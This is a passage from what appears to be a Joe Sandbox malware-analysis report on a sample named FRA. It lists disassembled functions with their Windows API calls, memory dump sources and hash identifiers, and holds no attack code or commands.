                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: File$AttributesCreate
                                                                          • String ID:
                                                                          • API String ID: 415043291-0
                                                                          • Opcode ID: 4c035aff046b4d43788645f88f630755698ea216f1f6cd5eefec511dda558379
                                                                          • Instruction ID: 0febe3887fb1e567d40345103610fd6f3e8d71b3c6328ccb34cdb50f288ecb70
                                                                          • Opcode Fuzzy Hash: 4c035aff046b4d43788645f88f630755698ea216f1f6cd5eefec511dda558379
                                                                          • Instruction Fuzzy Hash: 23D09E31254301AFEF099F20DE16F2E7AA2EB84B00F11952CB682A41E0DA7158299B15
                                                                          Function 00405DC5 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetFileAttributesA.KERNELBASE(?,?,004059DD,?,?,00000000,00405BC0,?,?,?,?), ref: 00405DCA
                                                                          • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405DDE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: AttributesFile
                                                                          • String ID:
                                                                          • API String ID: 3188754299-0
                                                                          • Opcode ID: 96c7ec262ab61fe6fea47152b5241fdb13327e4bfef36903235a76d16f55e530
                                                                          • Instruction ID: d43436b973e76c4b01283cada394ff82e8112d3abf3e5048573654bb382d62e0
                                                                          • Opcode Fuzzy Hash: 96c7ec262ab61fe6fea47152b5241fdb13327e4bfef36903235a76d16f55e530
                                                                          • Instruction Fuzzy Hash: C0D012725046206FC6113728EF0C89BBF55DB543717028F36F9A9A22F0CB304C56CB98
                                                                          Function 004058BB Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateDirectoryA.KERNELBASE(?,00000000,00403395,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040367F,?,00000008,0000000A,0000000C), ref: 004058C1
                                                                          • GetLastError.KERNEL32(?,00000008,0000000A,0000000C), ref: 004058CF
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: CreateDirectoryErrorLast
                                                                          • String ID:
                                                                          • API String ID: 1375471231-0
                                                                          • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                                          • Instruction ID: 30906a006ed9b45dc4efc70bb32269664e7cf578bac73b30a6d1da3a92a0b104
                                                                          • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                                          • Instruction Fuzzy Hash: 6AC04C71214A06DAD6506B219F087177BA5AB50741F25843AAA87F40A0DE3484A9DA2D
                                                                          Function 70752AC8 Relevance: 1.6, APIs: 1, Instructions: 143fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateFileA.KERNELBASE(00000000), ref: 70752B87
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2702525007.0000000070751000.00000020.00000001.01000000.00000006.sdmp, Offset: 70750000, based on PE: true
                                                                          • Associated: 00000000.00000002.2702483320.0000000070750000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2702568520.0000000070754000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2702605900.0000000070756000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_70750000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: dd62cd24c062b699ea9ffe88cc8f086b5c46639b91fb741fce397e6fc44e5d03
                                                                          • Instruction ID: 8e9e0a55b4eafc15534206563ba69ead7d6ece57e30a1b5a61044d6cacdd76bf
                                                                          • Opcode Fuzzy Hash: dd62cd24c062b699ea9ffe88cc8f086b5c46639b91fb741fce397e6fc44e5d03
                                                                          • Instruction Fuzzy Hash: 6E418272900209DFDB21DF75DE96BDD3775EB06354F708825F809C71A0D634A84A8BE5
                                                                          Function 004023C9 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 00402402
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: PrivateProfileStringWrite
                                                                          • String ID:
                                                                          • API String ID: 390214022-0
                                                                          • Opcode ID: 3326b8378841c5f3540bed9b182ec42c057636b7d1278427695ffb5e145c9da6
                                                                          • Instruction ID: f24de8215b53ecbcf80a61348f6bfc7870897c54b3e6c90e9d08f7162164e460
                                                                          • Opcode Fuzzy Hash: 3326b8378841c5f3540bed9b182ec42c057636b7d1278427695ffb5e145c9da6
                                                                          • Instruction Fuzzy Hash: 9DE04F3160413A6BEB6036B11F8D97F2159AB84314B14053EBA11B62C6D9FC8E8352A9
                                                                          Function 0040610B Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402D0F,00000000,?,?), ref: 00406134
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: Create
                                                                          • String ID:
                                                                          • API String ID: 2289755597-0
                                                                          • Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                                          • Instruction ID: b18ad94488713221ffc593fcfc53d42a6192d645bcccde5b7ab1a12412bbd52f
                                                                          • Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                                          • Instruction Fuzzy Hash: CDE0E672110209BEEF195F50DC0AD7B771DEB18314F01452EF947D4091E6B5E9305634
                                                                          Function 00405E62 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403357,00000000,00000000,004031B4,000000FF,00000004,00000000,00000000,00000000), ref: 00405E76
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: FileRead
                                                                          • String ID:
                                                                          • API String ID: 2738559852-0
                                                                          • Opcode ID: 62c77d97b5b576e4a72063145ecbe95ee4dab9ee0079c0f8f42f41321a19b9da
                                                                          • Instruction ID: bdd3cbd1d153ae02f25dac326e76355912a713e21b692c984e9b86253f54df5f
                                                                          • Opcode Fuzzy Hash: 62c77d97b5b576e4a72063145ecbe95ee4dab9ee0079c0f8f42f41321a19b9da
                                                                          • Instruction Fuzzy Hash: E9E0463220025AAFCF209FA1DC00AAB3B6CEB01260F000433FD58E2040D231E920CAE8
                                                                          Function 00405E91 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000008,?,00403325,00000000,004138D8,00000008,004138D8,00000008,000000FF,00000004,00000000), ref: 00405EA5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite
                                                                          • String ID:
                                                                          • API String ID: 3934441357-0
                                                                          • Opcode ID: 11d7c7005d0d3054af3b9be2f3a82004ed33d4240877e49ff836af06555e7eff
                                                                          • Instruction ID: fa2f0fbde9cfb659f44386b06c696d6bc658fd4b6b530f96672892f56a02ba52
                                                                          • Opcode Fuzzy Hash: 11d7c7005d0d3054af3b9be2f3a82004ed33d4240877e49ff836af06555e7eff
                                                                          • Instruction Fuzzy Hash: ACE08C3220121AABEF219F50DC00AEB3B6CEB00361F004836FA54E3150D230EA218BE8
                                                                          Function 707529B1 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(7075504C,00000004,00000040,7075503C), ref: 707529CF
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2702525007.0000000070751000.00000020.00000001.01000000.00000006.sdmp, Offset: 70750000, based on PE: true
                                                                          • Associated: 00000000.00000002.2702483320.0000000070750000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2702568520.0000000070754000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2702605900.0000000070756000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_70750000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 01345db0ac1814048da7f73541d8ea2d6b3b3adb37759eeedb36fe566c840c57
                                                                          • Instruction ID: 84b47f4483ebc6895d7fa0489dffa2705bff56cf6ea229881819197561b7be62
                                                                          • Opcode Fuzzy Hash: 01345db0ac1814048da7f73541d8ea2d6b3b3adb37759eeedb36fe566c840c57
                                                                          • Instruction Fuzzy Hash: D9F0C0B2900342DEC360CF3A8D647893FF0B715354BF1456AF54CD62E1E37450448B99
                                                                          Function 0040240D Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402440
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: PrivateProfileString
                                                                          • String ID:
                                                                          • API String ID: 1096422788-0
                                                                          • Opcode ID: 2bf3f178d14cd4560723ce1317423526718b1f73ef5608a9eed72cfac383f117
                                                                          • Instruction ID: 16d05768d70be94792168112439c0a82a49a1a045ba9b991e9e4b5323ac17763
                                                                          • Opcode Fuzzy Hash: 2bf3f178d14cd4560723ce1317423526718b1f73ef5608a9eed72cfac383f117
                                                                          • Instruction Fuzzy Hash: 2CE04F3190821DBAEB007FA08F09AAD2A69AF01720F10002AFA507A0D1E6B98583971D
                                                                          Function 004060DD Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,0040616B,?,?,?,?,00000000,?), ref: 00406101
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: Open
                                                                          • String ID:
                                                                          • API String ID: 71445658-0
                                                                          • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                                          • Instruction ID: e87fe2dc5984a8df625fa82ceba6c00b82b46dfa598ef8ab629b7034d9e3c4ec
                                                                          • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                                          • Instruction Fuzzy Hash: 5AD0123204020DBBEF119F90DD05FAB3B1DAB08310F014436FE06A4091D776D530A714
                                                                          Function 004015C2 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015CD
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: AttributesFile
                                                                          • String ID:
                                                                          • API String ID: 3188754299-0
                                                                          • Opcode ID: 6b1cf60723aa4e8bff23d7db920c2ef5ad98dfd6efc5b9eac5723742e010641f
                                                                          • Instruction ID: 1dc339858398e17bf6810321644557b22d6981813947759a2d5330f0c2e937d9
                                                                          • Opcode Fuzzy Hash: 6b1cf60723aa4e8bff23d7db920c2ef5ad98dfd6efc5b9eac5723742e010641f
                                                                          • Instruction Fuzzy Hash: 7BD01732708214DFDF60DBA8AF08A9FB3A4EB50328B20413BD211F21D1D6B9C5429B2D
                                                                          Function 00404343 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageA.USER32(00010450,00000000,00000000,00000000), ref: 00404355
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID:
                                                                          • API String ID: 3850602802-0
                                                                          • Opcode ID: 3f2b9804eab68573f146fdcade2b4da8b7421c4c2f1d53b715e4224501dc01bf
                                                                          • Instruction ID: 5e893e71cb28d1ecc651d20b4cbd375632880982d7b55d89439e603ef4ab6202
                                                                          • Opcode Fuzzy Hash: 3f2b9804eab68573f146fdcade2b4da8b7421c4c2f1d53b715e4224501dc01bf
                                                                          • Instruction Fuzzy Hash: 48C09BB17443017BDA209F519E45F07776C9750701F1554397754F54D0C6B5E510D72C
                                                                          Function 0040335A Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004030F6,?,?,?,004036EC,?,?,00000008,0000000A,0000000C), ref: 00403368
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: FilePointer
                                                                          • String ID:
                                                                          • API String ID: 973152223-0
                                                                          • Opcode ID: bee48198ef0a4de3628cda0e050061df99a752697c0ad5ddba35b49727997b0c
                                                                          • Instruction ID: 699dda5fb03a211c19396a68767747e6c986426da1756d7c47186a7ffa8d2f84
                                                                          • Opcode Fuzzy Hash: bee48198ef0a4de3628cda0e050061df99a752697c0ad5ddba35b49727997b0c
